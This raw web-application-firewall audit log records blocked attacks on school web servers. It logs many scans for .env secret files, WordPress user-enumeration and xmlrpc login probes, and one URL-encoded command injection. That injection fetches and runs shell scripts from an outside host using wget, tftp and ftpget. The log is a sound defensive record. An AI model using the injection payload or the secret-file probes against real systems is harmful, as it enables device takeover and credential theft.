Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749801322673788 732 (- - -) Stopwatch2: 1749801322673788 732; combined=286, p1=239, p2=0, p3=0, p4=0, p5=47, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afdf062c-Z-- --0677bb7c-A-- [13/Jun/2025:15:18:21 +0700] aEvezcmhAKaFi0V9-RN2lQAAANQ 103.236.140.4 32966 103.236.140.4 8181 --0677bb7c-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 104.167.221.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.167.221.114 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --0677bb7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0677bb7c-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749802701752858 1058 (- - -) Stopwatch2: 1749802701752858 1058; combined=473, p1=432, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0677bb7c-Z-- --cf42de49-A-- [13/Jun/2025:16:23:22 +0700] aEvuCsmhAKaFi0V9-ROZIQAAAMo 103.236.140.4 36956 103.236.140.4 8181 --cf42de49-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cf42de49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf42de49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602059917 1340 (- - -) Stopwatch2: 1749806602059917 1340; combined=392, p1=350, p2=0, p3=0, p4=0, p5=42, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf42de49-Z-- --02da1b61-A-- [13/Jun/2025:16:23:22 +0700] aEvuCh1N9VxFJpQ5cVhvQwAAAJE 103.236.140.4 36966 103.236.140.4 8181 --02da1b61-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --02da1b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02da1b61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602240843 977 (- - -) Stopwatch2: 1749806602240843 977; combined=396, p1=347, p2=0, p3=0, p4=0, p5=48, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02da1b61-Z-- --aa996c26-A-- [13/Jun/2025:16:23:22 +0700] aEvuCh1N9VxFJpQ5cVhvRAAAAJQ 103.236.140.4 36972 103.236.140.4 8181 --aa996c26-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --aa996c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa996c26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602421498 854 (- - -) Stopwatch2: 1749806602421498 854; combined=353, p1=314, p2=0, p3=0, p4=0, p5=39, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa996c26-Z-- --9c535469-A-- [13/Jun/2025:16:23:22 +0700] aEvuCv8ql0QLmijbYWZl9AAAAE8 103.236.140.4 36982 103.236.140.4 8181 --9c535469-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9c535469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c535469-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602601937 830 (- - -) Stopwatch2: 1749806602601937 830; combined=306, p1=270, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c535469-Z-- --57f36f08-A-- [13/Jun/2025:16:23:22 +0700] aEvuCv8ql0QLmijbYWZl9QAAAFU 103.236.140.4 36988 103.236.140.4 8181 --57f36f08-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --57f36f08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57f36f08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602782317 711 (- - -) Stopwatch2: 1749806602782317 711; combined=265, p1=231, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57f36f08-Z-- --96b45d3d-A-- [13/Jun/2025:16:23:22 +0700] aEvuCu9dCOerv4VGhqThlAAAAAY 103.236.140.4 36998 103.236.140.4 8181 --96b45d3d-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --96b45d3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96b45d3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602962675 859 (- - -) Stopwatch2: 1749806602962675 859; combined=290, p1=254, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96b45d3d-Z-- --ba6bd539-A-- [13/Jun/2025:16:23:54 +0700] aEvuKu9dCOerv4VGhqTh_gAAABg 103.236.140.4 38172 103.236.140.4 8181 --ba6bd539-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ba6bd539-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba6bd539-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806634296936 716 (- - -) Stopwatch2: 1749806634296936 716; combined=263, p1=229, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba6bd539-Z-- --f1f1784b-A-- [13/Jun/2025:16:23:56 +0700] aEvuLB1N9VxFJpQ5cVhvigAAAI0 103.236.140.4 38256 103.236.140.4 8181 --f1f1784b-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f1f1784b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1f1784b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806636197370 746 (- - -) Stopwatch2: 1749806636197370 746; combined=273, p1=237, p2=0, p3=0, p4=0, p5=35, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1f1784b-Z-- --a50fc614-A-- [13/Jun/2025:16:46:58 +0700] aEvzkv8ql0QLmijbYWZxugAAAFQ 103.236.140.4 59186 103.236.140.4 8181 --a50fc614-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.166.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.166.5 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a50fc614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a50fc614-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749808018167389 823 (- - -) Stopwatch2: 1749808018167389 823; combined=334, p1=291, p2=0, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a50fc614-Z-- --f571e82c-A-- [13/Jun/2025:17:38:07 +0700] aEv_j-9dCOerv4VGhqQIqQAAAAE 103.236.140.4 56338 103.236.140.4 8181 --f571e82c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f571e82c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f571e82c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749811087974086 2476 (- - -) Stopwatch2: 1749811087974086 2476; combined=1337, p1=400, p2=903, p3=0, p4=0, p5=33, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f571e82c-Z-- --bc362329-A-- [13/Jun/2025:18:32:48 +0700] aEwMYO9dCOerv4VGhqQowAAAABM 103.236.140.4 38362 103.236.140.4 8181 --bc362329-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.112.162 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --bc362329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc362329-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749814368269006 2846 (- - -) Stopwatch2: 1749814368269006 2846; combined=1277, p1=414, p2=836, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc362329-Z-- --6320c044-A-- [13/Jun/2025:18:32:49 +0700] aEwMYR1N9VxFJpQ5cVijKAAAAIs 103.236.140.4 38402 103.236.140.4 8181 --6320c044-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.112.162 X-Forwarded-Proto: http Connection: close Content-Length: 485 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/xml --6320c044-C-- system.multicall methodNamewp.getUsersBlogsparamsadminAŽERTY --6320c044-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6320c044-E-- --6320c044-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||103.236.140.4|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749814369069548 6184 (- - -) Stopwatch2: 1749814369069548 6184; combined=5041, p1=459, p2=4174, p3=31, p4=34, p5=220, sr=76, sw=123, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6320c044-Z-- --616a013f-A-- [13/Jun/2025:19:07:49 +0700] aEwUlf8ql0QLmijbYWatzgAAAEQ 103.236.140.4 35072 103.236.140.4 8181 --616a013f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 210.213.140.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 210.213.140.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --616a013f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --616a013f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749816469232303 3426 (- - -) Stopwatch2: 1749816469232303 3426; combined=2016, p1=589, p2=1392, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --616a013f-Z-- --1c133050-A-- [13/Jun/2025:20:57:47 +0700] aEwuW-9dCOerv4VGhqSBfwAAABg 103.236.140.4 53910 103.236.140.4 8181 --1c133050-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Googlebot-News Accept-Charset: utf-8 --1c133050-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c133050-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823067218077 781 (- - -) Stopwatch2: 1749823067218077 781; combined=335, p1=295, p2=0, p3=0, p4=0, p5=40, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c133050-Z-- --4d970a01-A-- [13/Jun/2025:20:57:56 +0700] aEwuZO9dCOerv4VGhqSBqgAAABY 103.236.140.4 54408 103.236.140.4 8181 --4d970a01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --4d970a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d970a01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823076718113 771 (- - -) Stopwatch2: 1749823076718113 771; combined=340, p1=303, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d970a01-Z-- --353ecf0a-A-- [13/Jun/2025:21:10:04 +0700] aEwxPP8ql0QLmijbYWbuYgAAAE0 103.236.140.4 35102 103.236.140.4 8181 --353ecf0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --353ecf0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --353ecf0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823804408026 807 (- - -) Stopwatch2: 1749823804408026 807; combined=375, p1=334, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --353ecf0a-Z-- --08069674-A-- [13/Jun/2025:21:10:07 +0700] aEwxP8mhAKaFi0V9-RN0cgAAANQ 103.236.140.4 35234 103.236.140.4 8181 --08069674-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --08069674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08069674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag 